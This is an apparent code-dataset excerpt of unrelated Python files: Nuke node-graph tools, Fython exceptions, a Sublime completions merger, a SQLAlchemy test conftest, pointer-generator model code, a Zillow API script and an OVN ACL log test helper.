    Returns:
        List of root nodes.
    """
    if results is None:
        results = []
    for dependency in node.dependencies():
        if not dependency.dependencies():
            results.append(dependency)
        else:
            find_root_nodes(dependency, results)
    if remove_roots_with_inputs:
        results = [res for res in results if res.maxInputs() == 0]
    return results
def upstream(node, max_depth=-1, deps=None):
    """Return the set of all nodes upstream of *node*.

    Args:
        node: starting node.
        max_depth: recursion depth limit; -1 means unlimited.
        deps: accumulator set used internally by the recursion; leave
            as None. (The previous mutable default ``set([])`` was
            shared between calls, so results leaked across calls.)

    Returns:
        Set of upstream nodes reachable through connection_filter.
    """
    if deps is None:
        deps = set()
    if max_depth != 0:
        new_deps = set(n for n in nuke.dependencies(node, what=connection_filter) if n not in deps)
        deps |= new_deps
        for dep in new_deps:
            upstream(dep, max_depth - 1, deps)
    return deps
def connected(nodes, upstream=True, downstream=True):
    """Return the set of all nodes reachable from *nodes*.

    Breadth-first traversal following the module-level connection_filter
    (inputs, hidden inputs, expressions, link knobs where supported).
    Based on nuke.overrides.selectConnectedNodes().
    """
    all_deps = set()
    deps_list = nodes
    evaluate_all = True
    while deps_list:
        deps = []
        if upstream:
            deps += nuke.dependencies(deps_list, connection_filter)
        if downstream:
            deps += nuke.dependentNodes(connection_filter, deps_list, evaluate_all)
        # Only force full expression evaluation on the first pass.
        evaluate_all = False
        # set.add() returns None, so "not all_deps.add(d)" both records d
        # in all_deps and keeps d in the next frontier in a single pass.
        deps_list = [d for d in deps if d not in all_deps and not all_deps.add(d)]
    return all_deps
def select_upstream(nodes):
    """Select and return every upstream dependency of *nodes*."""
    deps = list(connected(nodes, upstream=True, downstream=False))
    select(deps)
    return deps
def select_downstream(nodes):
    """Select and return every downstream dependent of *nodes*."""
    deps = list(connected(nodes, upstream=False, downstream=True))
    select(deps)
    return deps
def select_connected(nodes):
    """Select and return every node connected (up or down) to *nodes*."""
    deps = list(connected(nodes, upstream=True, downstream=True))
    select(deps)
    return deps
def select_unused(nodes):
    """Select every node not connected (up- or downstream) to *nodes*.

    Backdrops, and Dot nodes that carry a label, are never treated as
    unused. Returns the list of newly selected nodes.
    """
    linked = connected(nodes, upstream=True, downstream=True)
    unused_nodes = []
    for n in nuke.allNodes():
        if n in linked:
            continue
        if n.Class() == 'BackdropNode':
            continue
        if n.Class() == 'Dot' and n['label'].getValue():
            continue
        unused_nodes.append(n)
    unselect()
    select(unused_nodes)
    return unused_nodes
# DAG Positions
# Inspired by <NAME>'s sb_dagPosition.py https://www.bjorkvisuals.com/tools/the-foundrys-nuke/python
# Using built-in nukescripts.bookmarks module now instead.
def save_dag_pos(preset):
    """Save the current DAG zoom/position into slot *preset* (1-based).

    Presets are stored on the active viewer node in a 'dagpos' string
    knob holding ten colon-separated 'zoom,x,y' triples.
    """
    zoom = nuke.zoom()
    pos = nuke.center()
    viewer = nuke.activeViewer()
    if not viewer:
        nuke.message('Error: please create a viewer to store the dag positions on...')
        return
    else:
        viewer = viewer.node()
    if 'dagpos' not in viewer.knobs():
        # First use: create the storage knob pre-filled with ten empty slots.
        viewer.addKnob(nuke.String_Knob('dagpos', 'dagpos', '0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0:0,0,0'))
        dagpos_knob = viewer['dagpos']
        dagpos_knob.setFlag(nuke.STARTLINE)
        dagpos_knob.setEnabled(False)
    else:
        dagpos_knob = viewer['dagpos']
    # Replace the requested slot with the current zoom and center.
    dagpos_vals = dagpos_knob.getValue().split(':')
    dagpos_vals.pop(preset-1)
    new_dagpos = ','.join([str(zoom), str(pos[0]), str(pos[1])])
    dagpos_vals.insert(preset-1, new_dagpos)
    dagpos_knob.setValue(':'.join(dagpos_vals))
def load_dag_pos(preset):
    """Restore DAG zoom/position from slot *preset* saved by save_dag_pos()."""
    viewer = nuke.activeViewer()
    if not viewer:
        nuke.message('Error: please create a viewer to store the dag positions on...')
        return
    viewer = viewer.node()
    if 'dagpos' not in viewer.knobs():
        nuke.message('No preset positions created yet...')
        return
    dagpos_knob = viewer['dagpos']
    # Each slot is a 'zoom,x,y' triple; slots are colon-separated.
    dagpos_vals = dagpos_knob.getValue().split(':')[preset-1]
    zoom, xpos, ypos = dagpos_vals.split(',')
    nuke.zoom(float(zoom), [float(xpos), float(ypos)])
#----------------------------------------------------------------------------------
# Hidden Input Link Nodes
# This is no longer used in favor of the anchor / pointer workflow
def hidden_inputs_in_selection(nodes):
    """Return the nodes in *nodes* whose 'hide_input' knob exists and is on."""
    result = []
    for node in nodes:
        if 'hide_input' in node.knobs() and node['hide_input'].getValue():
            result.append(node)
    return result
def set_hlink_knobs(nodes):
    """Stamp each hidden-input node with an 'hlink_node' knob.

    The knob records the full name of the node's current input so the
    hidden connection can be restored after a copy/paste.
    """
    for node in hidden_inputs_in_selection(nodes):
        if not 'hlink_node' in node.knobs():
            node.addKnob(nuke.String_Knob('hlink_node', 'hlink_node'))
        input_node = node.input(0)
        if input_node:
            node['hlink_node'].setValue(input_node.fullName())
        else:
            # No input: clear the recorded target.
            node['hlink_node'].setValue('')
def hlink_copy():
    """Copy the selected nodes to the clipboard, stamping hlink knobs first."""
    selection = nuke.selectedNodes()
    if not selection:
        return
    set_hlink_knobs(selection)
    nuke.nodeCopy('%clipboard%')
def hlink_cut():
    """Cut the selected nodes: copy with hlink metadata, then delete."""
    hlink_copy()
    nukescripts.node_delete(popupOnError=True)
def hlink_paste():
    """Paste nodes and reconnect hidden-input nodes to their recorded targets."""
    nuke.nodePaste('%clipboard%')
    for node in hidden_inputs_in_selection(nuke.selectedNodes()):
        if 'hlink_node' not in node.knobs():
            continue
        target = nuke.toNode(node['hlink_node'].getValue())
        if target:
            node.setInput(0, target)
def hlink_create():
    """Create a hidden-input link (hlink) Dot for every selected node.

    Each Dot is wired to its source node, stamped with an 'hlink_node'
    knob, labelled after the target, and placed two grid units to the
    left. The new Dots end up selected.
    """
    nodes = nuke.selectedNodes()
    unselect()
    hlinks = []
    for node in nodes:
        hlink = nuke.createNode('Dot', 'hide_input 1 note_font_size 18', inpanel=False)
        hlinks.append(hlink)
        hlink.setInput(0, node)
        target_name = node.fullName()
        set_hlink_knobs([hlink])
        hlink['hlink_node'].setValue(target_name)
        label = hlink['label']
        target_label = node['label'].getValue()
        # Reads show their filename; otherwise prefer the target's label,
        # falling back to the target's full node name.
        if node.Class() == 'Read':
            label.setValue(' | ' + node['label'].getValue() + '\n' + os.path.basename(node['file'].getValue()))
        elif target_label:
            label.setValue(' | ' + target_label)
        else:
            label.setValue(' | ' + target_name)
        hlink.setXYpos(node.xpos() - grid[0]*2, node.ypos()-grid[1]*0)
        nuke.autoplaceSnap(hlink)
    _ = [n.setSelected(True) for n in hlinks]
def dec2hex(dec):
    """Convert a packed Nuke tile_color integer (0xRRGGBBAA) into an
    '0xrrggbb' hex string, dropping the alpha byte."""
    padded = format(dec, '08x')
    r = int(padded[0:2], 16)
    g = int(padded[2:4], 16)
    b = int(padded[4:6], 16)
    return '0x{:02x}{:02x}{:02x}'.format(r, g, b)
def create_pointer():
    """Create an anchor / pointer pair for each selected node.

    The anchor is inserted after the target and stores a user-visible
    title; the pointer is a hidden-input node that auto-reconnects to
    the anchor by name (via its autolabel expression), giving a wireless
    link across the DAG.
    """
    # Create an anchor / pointer set
    # Customization Options
    # Node class to use for anchor / pointer nodes. Defaults to NoOp but could be a Dot node if you prefer
    AP_CLASS = 'NoOp'
    # Displays an input / output icon on the node to visually differentiate it from the standard node class
    AP_ICON = True
    nodes = nuke.selectedNodes()
    if not nodes:
        return
    for target in nodes:
        upstream = [n for n in connected(nodes, upstream=True, downstream=False)]
        if len(upstream) > 5:
            if not nuke.ask('More than 5 upstream nodes. Are you sure you want to continue?'):
                return
        # Random suffix keeps anchor/pointer node names unique per set.
        randstr = ''.join(random.choice(string.ascii_lowercase) for i in range(4))
        topnode = get_topnode(target)
        target_label = target['label'].getValue()
        # If topnode has a file knob, use that to set title
        # If it's a roto node, use the roto label
        if 'file' in topnode.knobs():
            pointer_title = os.path.basename(topnode['file'].getValue())
            if '.' in pointer_title:
                pointer_title = pointer_title.split('.')[0]
        elif topnode.Class() in ['Roto', 'RotoPaint'] and topnode['label'].getValue():
            pointer_title = topnode['label'].getValue()
        elif target_label:
            pointer_title = target_label
        else:
            pointer_title = ''
        topnode_color = topnode['tile_color'].value()
        if topnode_color == 0:
            # Get default color from prefs if node is not colored https://community.foundry.com/discuss/topic/103301/get-the-default-tile-color-from-preferences
            prefs = nuke.toNode('preferences')
            default_colors = {prefs['NodeColour{0:02d}Color'.format(i)].value(): prefs['NodeColourClass{0:02d}'.format(i)].value() for i in range(1, 14)}
            node_class = topnode.Class().lower()
            node_class = ''.join([i for i in node_class if not i.isdigit()])
            for color, classes in default_colors.items():
                if node_class in classes:
                    topnode_color = color
                    break
            if 'deep' in node_class:
                topnode_color = prefs['NodeColourDeepColor'].value()
        if len(nodes) == 1:
            # Only prompt the user for info if there is one selected node
            panel = nuke.Panel('Create Pointer')
            panel.addSingleLineInput('title', pointer_title)
            if panel.show():
                pointer_title = panel.value('title')
            else:
                return
        has_downstream = len(select_downstream(target)) > 0
        unselect()
        if not has_downstream:
            target.setSelected(True)
        # create anchor node
        anchor = nuke.createNode(AP_CLASS, 'name ___anchor_{0}{1}label "<font size=7>\[value title]"'.format(randstr, ' icon Output.png ' if AP_ICON else ' '))
        anchor.addKnob(nuke.Tab_Knob('anchor_tab', 'anchor'))
        anchor.addKnob(nuke.String_Knob('title', 'title'))
        anchor['title'].setValue(pointer_title)
        anchor['tile_color'].setValue(topnode_color)
        anchor.setInput(0, target)
        anchor.setSelected(True)
        # create pointer node
        pointer = nuke.createNode(AP_CLASS, 'name ___pointer_{0} hide_input true{1}'.format(randstr, ' icon Input.png ' if AP_ICON else ''))
        pointer.addKnob(nuke.Tab_Knob('pointer_tab', 'pointer'))
        pointer.addKnob(nuke.String_Knob('target', 'target'))
        pointer['target'].setValue(anchor.fullName())
        pointer['label'].setValue('<font size=7> [if {[exists input.title]} {return [value input.title]}]')
        pointer.addKnob(nuke.PyScript_Knob('connect_to_target', 'connect'))
        pointer['connect_to_target'].setFlag(nuke.STARTLINE)
        pointer.addKnob(nuke.PyScript_Knob('zoom_to_target', 'zoom'))
        pointer.addKnob(nuke.PyScript_Knob('set_target', 'set target'))
        pointer['connect_to_target'].setValue('''n = nuke.thisNode()
t = n['target'].getValue()
if nuke.exists(t):
    tn = nuke.toNode(t)
    n.setInput(0, tn)''')
        pointer['zoom_to_target'].setValue('''t = nuke.thisNode()['target'].getValue()
if nuke.exists(t):
    tn = nuke.toNode(t)
    nuke.zoom(2.0, [tn.xpos(), tn.ypos()])''')
        pointer['set_target'].setValue('''n = nuke.thisNode()
sn = nuke.selectedNodes()
if sn:
    t = sn[-1]
    n['target'].setValue(t.fullName())''')
        # set autolabel knob to execute python script to reconnect node to target.
        # it's a hack but it works to automatically reconnect the input without using knobChanged callbacks!
        # FYI, onCreate callback can not connect input 0 due to a nuke bug
        pointer['autolabel'].setValue('"{0}\\n{1}".format(nuke.thisNode().name(), nuke.thisNode()["label"].evaluate()) if nuke.thisNode().setInput(0, nuke.toNode(nuke.thisNode()["target"].getValue())) else ""')
        pointer.setXYpos(anchor.xpos(), anchor.ypos()+120)
        pointer['tile_color'].setValue(topnode_color)
def create_dots(side=False):
    """Create a Dot node for each selected node.

    By default the Dot is placed two grid units below its node (and
    connected automatically via selection); with side=True it is placed
    one grid unit to the left and wired explicitly.
    """
    nodes = nuke.selectedNodes()
    dots = list()
    for node in nodes:
        unselect()
        pos = get_pos(node)
        if not side:
            # Selecting the node makes createNode connect the Dot to it.
            select([node])
        dot = nuke.createNode('Dot', inpanel=False)
        if side:
            set_pos(dot, pos[0] - grid[0], pos[1])
            dot.setInput(0, node)
        else:
            set_pos(dot, pos[0], pos[1] + grid[1]*2)
        dots.append(dot)
        unselect(dot)
    select(dots)
    if not nodes:
        # Nothing was selected: just drop a Dot at the cursor position.
        dot = nuke.createNode('Dot', inpanel=False)
def create_transform():
    """Create a Transform (2D) or TransformGeo (3D) node for each selected
    node, choosing by whether the node exposes a 'render_mode' knob."""
    nodes = nuke.selectedNodes()
    if not nodes:
        nuke.createNode('Transform')
        return
    unselect()
    created = []
    for node in nodes:
        node.setSelected(True)
        # 3D nodes (those with a render_mode knob) get a TransformGeo.
        node_class = 'TransformGeo' if 'render_mode' in node.knobs() else 'Transform'
        new_node = nuke.createNode(node_class)
        if new_node:
            created.append(new_node)
    unselect()
    select(created)
def read_from_write():
    """Create Read nodes pointing at the output files of the selected
    Write (or other file-knob) nodes, copying colorspace settings.

    Sequence paths ('#' or printf-style '%' padding) are resolved through
    nuke.getFileNameList() so the Read gets a frame-range-aware path.
    """
    nodes = [n for n in nuke.selectedNodes() if 'file' in n.knobs()]
    excluded = ['Read', ]
    for node in nodes:
        if node.Class() in excluded:
            continue
        pos = get_pos(node)
        filepath = node['file'].getValue()
        if '[' in filepath:
            # Path contains a TCL expression; resolve it so the directory
            # scan below sees a real path. (Previously the evaluated path
            # was computed but never used — a bug.)
            filepath = node['file'].evaluate()
        dirname = os.path.dirname(filepath)
        filename = os.path.basename(filepath)
        if '#' in filename:
            is_sequence = True
            filename_base = filename.split('#')[0]
        elif r'%' in filename:
            is_sequence = True
            filename_base = filename.split(r'%')[0]
        else:
            is_sequence = False
        if is_sequence:
            # Ask Nuke for the frame-range formatted sequence names.
            sequences = nuke.getFileNameList(dirname)
            for seq in sequences:
                if seq.startswith(filename_base):
                    filepath = os.path.join(dirname, seq)
                    break
        read = nuke.createNode('Read', 'file {{{0}}}'.format(filepath), inpanel=False)
        set_pos(read, pos[0], pos[1] + grid[1]*4)
        # match colorspace
        colorspace = node['colorspace'].value()
        if '(' in colorspace and ')' in colorspace:
            # Parse the role name out of e.g. "compositing_linear (linear)".
            colorspace = colorspace.split('(')[1].split(')')[0]
        read['colorspace'].setValue(colorspace)
        read['raw'].setValue(node['raw'].getValue())
# Enhanced swap functionality.
def swap_node():
    """Swap/reverse each selected node: A/B inputs, colorspace in/out,
    or the first matching direction/invert/reverse toggle knob."""
    for node in nuke.selectedNodes():
        if node.inputs() > 1:
            nukescripts.swapAB(node)
        knobs = node.knobs()
        if node.Class() == 'OCIOColorSpace':
            src = node['in_colorspace'].value()
            dst = node['out_colorspace'].value()
            node['out_colorspace'].setValue(src)
            node['in_colorspace'].setValue(dst)
        elif 'direction' in knobs:
            knob = node['direction']
            knob.setValue(0 if knob.getValue() == 1 else 1)
        elif 'invert' in knobs:
            knob = node['invert']
            knob.setValue(0 if knob.getValue() == 1 else 1)
        elif 'reverse' in knobs:
            knob = node['reverse']
            knob.setValue(0 if knob.getValue() == 1 else 1)
        elif node.Class() == 'Colorspace':
            src = node['colorspace_in'].value()
            dst = node['colorspace_out'].value()
            node['colorspace_out'].setValue(src)
            node['colorspace_in'].setValue(dst)
def swap_view():
    """Toggle the active viewer between the first two views (e.g. stereo)."""
    views = nuke.views()
    if len(views) != 2:
        return
    viewer = nuke.activeViewer()
    viewer.setView(views[1] if viewer.view() == views[0] else views[0])
| 2 | 2 |
fython/config/exception.py | nicolasessisbreton/fython | 41 | 12766440 | # base
class FyException(Exception):
    """Base class for all Fython errors.

    The printable message starts with a ';;;;;' marker line, then the
    exception class name rendered with underscores as spaces, then the
    supplied detail message.
    """

    def __init__(s, message):
        header = s.__class__.__name__.replace('_', ' ')
        s.message = '\n;;;;;\n' + header + '\n' + str(message)

    def __str__(s):
        return s.message
# Concrete error types. Class names double as the user-facing headline:
# FyException.__init__ renders the class name with '_' -> ' ', so names
# are written as full lowercase sentences.
class a_function_cannot_be_dotted(FyException):
    pass

class cannot_indent_on_first_line(FyException):
    pass

class cannot_find_attribute_in_class(FyException):
    pass

class cannot_find_attribute_setter_in_class(FyException):
    pass

class cannot_find_targetted_ast(FyException):
    pass

class cannot_mix_args_and_kwargs(FyException):
    pass

class cannot_overwrite_spec(FyException):
    pass

class cannot_resolve_modifier(FyException):
    pass

class cannot_set_reference_with_a_property_setter(FyException):
    pass

class cannot_find_class_definition_in_module(FyException):
    pass

class compilation_error(FyException):
    pass

class else_without_if_elif_where_or_elwhere(FyException):
    pass

class error_in_interpolant(FyException):
    pass

class fortran_file_not_found(FyException):
    pass

class guid_override_error(FyException):
    pass

class indentation_increased_by_more_than_one_level(FyException):
    pass

class indentation_without_colon(FyException):
    pass

class inconsistent_mro(FyException):
    pass

class intrinsic_type_cannot_be_dotted(FyException):
    pass

class invalid_url(FyException):
    pass

class left_element_in_aliased_import_is_not_an_url(FyException):
    pass

class interpretation_error(FyException):
    pass

class lexical_interpolation_is_only_on_routine_or_class(FyException):
    pass

class linking_error(FyException):
    pass

class mark_newlinex_lexing_error(FyException):
    pass

class mixed_indentation(FyException):
    pass

class nb_of_arguments_mismatch(FyException):
    pass

class no_element_specified_in_slice_import(FyException):
    pass

class no_fortran_compiler_found(FyException):
    pass

class only_aliased_namespace_star_or_slice_import_are_allowed(FyException):
    pass

class only_attribute_or_method_can_be_inherited(FyException):
    pass

class only_star_import_allowed_for_shared_library(FyException):
    pass

class only_star_or_slice_import_allowed_for_fortran(FyException):
    pass

class python_import_error(FyException):
    pass

class space_tab_mixed(FyException):
    pass

class syntax_error(FyException):
    pass

class unbalanced_parenthesis(FyException):
    pass

class fml_error(FyException):
    pass

class module_not_found(FyException):
    pass

class name_not_found_in_fython_module(FyException):
    pass

class package_not_found(FyException):
    pass

class resolution_error(FyException):
    pass

class string_format_error(FyException):
    pass

class unknown_identifier(FyException):
    pass

class unknown_print_mode(FyException):
    pass
| 2.53125 | 3 |
Unity Shader/scripts/completions.py | xdegtyarev/SublimeConfig | 0 | 12766441 | <filename>Unity Shader/scripts/completions.py<gh_stars>0
import re
import os
class Record(object):
    """One completion entry from a .sublime-completions file.

    trigger: full trigger text as it appears in the file (may include an
        escaped-tab hint suffix).
    content: the snippet inserted when the completion is chosen.
    shortTrigger: the bare word part of trigger, used as a dedup key.
    """
    def __init__(self, trigger = "", content = "", shortTrigger = ""):
        self.trigger = trigger
        self.content = content
        self.shortTrigger = shortTrigger
def readFile(path):
    """Parse a .sublime-completions file into {shortTrigger: Record}."""
    f = open(path, 'r')
    buf = f.read()
    f.close()
    records = {}
    # Scrape trigger/contents pairs straight out of the JSON-ish text.
    recordsIter = re.finditer(r'"trigger":\s"(.*)",\s"contents":\s"(.*)"', buf)
    for i in recordsIter:
        trigger = i.group(1)
        content = i.group(2)
        # print(trigger)
        # r"\\t" matches a literal backslash-t: the escaped tab separating
        # the trigger word from its hint text inside the file.
        regMatch = re.search(r"^(\w+)(\\t.*)?$", trigger)
        if regMatch:
            shortTrigger = regMatch.group(1)
        else:
            shortTrigger = trigger
        r = Record(trigger, content, shortTrigger)
        records[shortTrigger] = r
        # print(r.trigger, r.content)
    return records
def writeFile(records, path):
    """Write *records* back out as a sorted .sublime-completions file."""
    f = open(path, 'w')
    f.write(r'''{
    "scope": "source.shader",
    "completions":
    [
''')
    # Sort by shortTrigger key for a stable, diff-friendly output.
    recordList = list(records.items())
    recordList.sort()
    for k, v in recordList:
        line = '        { "trigger": "%s", "contents": "%s"},\n' % (v.trigger, v.content)
        f.write(line)
    f.write(r'''    ]
}
''')
    f.close()
def Sub(a, b):
    """Remove from dict *a* (in place) every key that also appears in *b*."""
    print("Before Sub, len(a) = %s len(b) = %s" % (len(a), len(b)))
    for k in b:
        # Membership test instead of a.get(k): a truthy-value check would
        # silently skip keys whose stored value happens to be falsy.
        if k in a:
            a.pop(k)
    print("After Sub, len(a) = %s len(b) = %s" % (len(a), len(b)))
def Add(a, b):
    """Copy into dict *a* (in place) every entry of *b* whose key is absent from *a*."""
    print("Before Add, len(a) = %s len(b) = %s" % (len(a), len(b)))
    for k, v in b.items():
        # Membership test instead of a.get(k): a truthy-value check would
        # overwrite entries whose stored value happens to be falsy.
        if k not in a:
            a[k] = v
            print("Add: ", k)
    print("After Add, len(a) = %s len(b) = %s" % (len(a), len(b)))
# One-off maintenance run: strip entries duplicated from the builtin
# completions out of the global completions file. Paths are hard-coded to
# a local Windows Sublime Text install; the writeFile call is commented
# out so nothing is overwritten by accident.
cg = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\cg.sublime-completions")
builtin = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\builtin.sublime-completions")
globalComletions = readFile(r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\global.sublime-completions")
# Add(cg, builtin)
Sub(globalComletions, builtin)
# writeFile(globalComletions, r"C:\Users\Administrator\AppData\Roaming\Sublime Text 3\Packages\UnityShader\global.sublime-completions")
test/conftest.py | Thhhza/sqlalchemy | 1 | 12766442 | #!/usr/bin/env python
"""
pytest plugin script.
This script is an extension to py.test which
installs SQLAlchemy's testing plugin into the local environment.
"""
import sys
from os import path
# Prepend the repo's ../lib directory so the in-tree SQLAlchemy is
# imported ahead of any installed copy.
for pth in ['../lib']:
    sys.path.insert(0, path.join(path.dirname(path.abspath(__file__)), pth))
from sqlalchemy.testing.plugin.pytestplugin import *
| 1.71875 | 2 |
src/models/generator.py | RowitZou/RankAE | 23 | 12766443 | import torch
import torch.nn as nn
from models.neural import aeq
from models.neural import gumbel_softmax
class Generator(nn.Module):
    """Project decoder hidden states to a log-probability distribution
    over the vocabulary, with the padding token masked out."""

    def __init__(self, vocab_size, dec_hidden_size, pad_idx):
        super(Generator, self).__init__()
        self.linear = nn.Linear(dec_hidden_size, vocab_size)
        self.softmax = nn.LogSoftmax(dim=-1)
        self.pad_idx = pad_idx

    def forward(self, x, use_gumbel_softmax=False):
        logits = self.linear(x)
        # The pad token must never be generated; force its score to -inf.
        logits[:, self.pad_idx] = -float('inf')
        if use_gumbel_softmax:
            return gumbel_softmax(logits, log_mode=True, dim=-1)
        return self.softmax(logits)
class CopyGenerator(nn.Module):
    """An implementation of pointer-generator networks
    :cite:`DBLP:journals/corr/SeeLM17`.

    These networks consider copying words directly from the source
    sequence. The copy generator is an extended version of the standard
    generator that computes three values:

    * :math:`p_{softmax}` the standard softmax over `tgt_dict`
    * :math:`p(z)` the probability of copying a word from the source
    * :math:`p_{copy}` the probability of copying a particular word,
      taken from the attention distribution directly.

    The model returns a distribution over the extended dictionary,
    computed as

    :math:`p(w) = p(z=1) p_{copy}(w) + p(z=0) p_{softmax}(w)`

    .. mermaid::
       graph BT
          A[input]
          S[src_map]
          B[softmax]
          BB[switch]
          C[attn]
          D[copy]
          O[output]
          A --> B
          A --> BB
          S --> D
          C --> D
          D --> O
          B --> O
          BB --> O

    Args:
        input_size (int): size of input representation
        output_size (int): size of output vocabulary
        pad_idx (int): index of the padding token (never generated)
    """
    def __init__(self, output_size, input_size, pad_idx):
        super(CopyGenerator, self).__init__()
        self.linear = nn.Linear(input_size, output_size)
        self.linear_copy = nn.Linear(input_size, 1)
        # NOTE(review): self.softmax is defined but unused in forward(),
        # which applies torch.softmax directly — confirm it can be removed.
        self.softmax = nn.LogSoftmax(dim=-1)
        self.pad_idx = pad_idx
    def forward(self, hidden, attn, src_map, use_gumbel_softmax=False):
        """
        Compute a distribution over the target dictionary extended by the
        dynamic dictionary implied by copying source words.

        Args:
            hidden (FloatTensor): hidden outputs ``(batch x tlen, input_size)``
            attn (FloatTensor): attn for each ``(batch x tlen, slen)``
            src_map (FloatTensor):
                A sparse indicator matrix mapping each source word to
                its index in the "extended" vocab containing.
                ``(batch, src_len, extra_words)``
            use_gumbel_softmax (bool): sample the vocab distribution via
                gumbel-softmax instead of a plain softmax.
        """
        # CHECKS
        batch_by_tlen, _ = hidden.size()
        batch_by_tlen_, slen = attn.size()
        batch, slen_, cvocab = src_map.size()
        aeq(batch_by_tlen, batch_by_tlen_)
        aeq(slen, slen_)
        # Original probabilities.
        logits = self.linear(hidden)
        # Padding must never be generated: mask it out before normalizing.
        logits[:, self.pad_idx] = -float('inf')
        if use_gumbel_softmax:
            prob = gumbel_softmax(logits, log_mode=False, dim=1)
        else:
            prob = torch.softmax(logits, 1)
        # Probability of copying p(z=1) batch.
        p_copy = torch.sigmoid(self.linear_copy(hidden))
        # Probability of not copying: p_{word}(w) * (1 - p(z))
        out_prob = torch.mul(prob, 1 - p_copy)
        mul_attn = torch.mul(attn, p_copy)
        # Project attention mass through src_map into extended-vocab slots.
        copy_prob = torch.bmm(
            mul_attn.view(batch, -1, slen),
            src_map
        )
        copy_prob = copy_prob.contiguous().view(-1, cvocab)
        # Concatenate: [vocab probs | extended (copied) vocab probs].
        return torch.cat([out_prob, copy_prob], 1)
def collapse_copy_scores(scores, batch, tgt_vocab, src_vocabs=None,
                         batch_dim=0, batch_offset=None, beam_size=1, segs_index=None):
    """
    Given scores from an expanded dictionary
    corresponding to a batch, sums together copies,
    with a dictionary word when it is ambiguous.

    For each source-vocab word that also exists in tgt_vocab, the
    extended-vocab copy score is folded into the regular vocab slot and
    the copy slot is zeroed. Mutates and returns *scores*.
    """
    offset = len(tgt_vocab)
    if segs_index is None:
        # Map each flattened (example x beam) row back to its segment index.
        segs_index = torch.repeat_interleave(torch.arange(len(batch.ex_segs), dtype=torch.long),
                                             torch.tensor(batch.ex_segs) * beam_size, dim=0)
    for b in range(scores.size(batch_dim)):
        blank = []
        fill = []
        if src_vocabs is None:
            src_vocab = batch.src_ex_vocab[segs_index[b]]
        else:
            batch_id = batch_offset[b] if batch_offset is not None else b
            index = batch.indices.data[batch_id]
            src_vocab = src_vocabs[index]
        # Start at 1 to skip the <unk>/pad slot of the example vocab.
        for i in range(1, len(src_vocab)):
            sw = src_vocab.itos[i]
            ti = tgt_vocab[sw]
            if ti != 0:
                blank.append(offset + i)
                fill.append(ti)
        if blank:
            blank = torch.tensor(blank, device=scores.device)
            fill = torch.tensor(fill, device=scores.device)
            score = scores[:, b] if batch_dim == 1 else scores[b]
            # Add each copy score onto its in-vocab slot, then zero the copy slot.
            score.index_add_(1, fill, score.index_select(1, blank))
            score.index_fill_(1, blank, 0.)
    return scores
| 3.078125 | 3 |
mre/helper/__init__.py | CherryKitten/mre | 0 | 12766444 | from .Range import Range
| 1.078125 | 1 |
notes/code/zillow/chart.py | akkiittiwari/msan692 | 0 | 12766445 | <reponame>akkiittiwari/msan692
# REGISTER: https://www.zillow.com/user/Register.htm
# API REGISTER: https://www.zillow.com/webservice/Registration.htm
# API DOC: http://www.zillow.com/howto/api/APIOverview.htm
# Run with args: yourzipid "190 7th St APT 4" "San Francisco, CA"
import sys
import untangle
import urllib2
import urllib
KEY = sys.argv[1] # your zillow api key/id as argument to script

# Fetch a 10-year percent-value chart for a hard-coded property.
# NOTE(review): despite the original "Find a house" intent, this calls
# GetChart with a fixed zpid yet parses the response as a
# GetSearchResults payload (SearchResults_searchresults) — verify the
# expected XML root against the Zillow API docs (GetChart normally
# returns a 'Chart:chart' document).
SearchURL = "http://www.zillow.com/webservice/GetChart.htm?zws-id=%s&zpid=%s&unit-type=percent&width=500&height=250&chartDuration=10years"
URL = SearchURL % (KEY, '64969892')
response = urllib2.urlopen(URL)
xmldata = response.read()
print xmldata

xml = untangle.parse(xmldata)
# Zillow message code '0' means success.
code = xml.SearchResults_searchresults.message.code.cdata
if code=='0':
    zpid = xml.SearchResults_searchresults.response.results.result.zpid.cdata
    print zpid
else:
    msg = xml.SearchResults_searchresults.message.text.cdata
    print msg
| 2.953125 | 3 |
tests/check_acl_log.py | shenjiangc/ovn | 1 | 12766446 | <reponame>shenjiangc/ovn
#!/usr/bin/env python3
import argparse
import string
def strip(val):
    """Strip surrounding whitespace and single/double quotation marks from val."""
    return val.strip(string.whitespace + "\"'")
def parse_acl_log(line):
    """Convert an ACL log string into a dict.

    Assumes the default ovn-controller log format:
    ``...|acl_name=...,verdict=...: protocol,field=value,...``
    """
    # First cut off the logging preamble.
    # We're assuming the default log format.
    acl_log = {}
    _, _, details = line.rpartition("|")
    # acl_details are things like the acl name, direction,
    # verdict, and severity. packet_details are things like
    # the protocol, addresses, and ports of the packet being
    # logged.
    acl_details, _, packet_details = details.partition(":")
    for datum in acl_details.split(","):
        name, _, value = datum.rpartition("=")
        acl_log[strip(name)] = strip(value)
    for datum in packet_details.split(","):
        name, _, value = datum.rpartition("=")
        if not name:
            # The protocol is not preceded by "protocol="
            # so we need to add it manually.
            name = "protocol"
        acl_log[strip(name)] = strip(value)
    return acl_log
def get_acl_log(entry_num=1):
    """Return the *entry_num*-th (1-based) acl_log line from ovn-controller.log.

    Exits the process with status 1 if fewer than entry_num entries exist.
    """
    with open("ovn-controller.log", "r") as controller_log:
        acl_logs = [line for line in controller_log if "acl_log" in line]
    try:
        return acl_logs[entry_num - 1]
    except IndexError:
        print(
            f"There were not {entry_num} acl_log entries, \
                only {len(acl_logs)}"
        )
        exit(1)
def add_parser_args(parser):
parser.add_argument("--entry-num", type=int, default=1)
# There are other possible things that can be in an ACL log,
# and if we need those in the future, we can add them later.
parser.add_argument("--name")
parser.add_argument("--verdict")
parser.add_argument("--severity")
parser.add_argument("--protocol")
parser.add_argument("--vlan_tci")
parser.add_argument("--dl_src")
parser.add_argument("--dl_dst")
parser.add_argument("--nw_src")
parser.add_argument("--nw_dst")
parser.add_argument("--nw_tos")
parser.add_argument("--nw_ecn")
parser.add_argument("--nw_ttl")
parser.add_argument("--icmp_type")
parser.add_argument("--icmp_code")
parser.add_argument("--tp_src")
parser.add_argument("--tp_dst")
parser.add_argument("--tcp_flags")
parser.add_argument("--ipv6_src")
parser.add_argument("--ipv6_dst")
def main():
    """Compare a parsed ACL log entry against the expected fields given on
    the command line; exit(1) on any mismatch or missing field."""
    parser = argparse.ArgumentParser()
    add_parser_args(parser)
    args = parser.parse_args()
